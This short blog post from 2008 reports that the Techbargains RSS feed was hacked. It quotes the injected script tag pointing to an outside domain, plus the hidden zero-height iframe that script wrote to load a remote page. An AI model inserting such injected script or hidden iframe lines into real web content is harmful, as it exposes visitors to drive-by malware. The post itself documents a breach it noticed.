Thursday, August 7, 2008

Techbargains gets cracked

My dealviewer started serving up some bogus data from Techbargains today. I'm going to have to say that when your rss feed starts containing text like:

<script src="http://jjmaoduo.3322.org/csrss/w.js"></script>

which pulls down code that does this:

document.write("<iframe width=100 height=0 src=http://mh.976801.cn/flash.htm></iframe>");

...you can safely conclude that your data and code are in the hands of someone you probably don't know.

Judging by the message about the site undergoing "maintenance," I'd say they already know about it.

0 comments: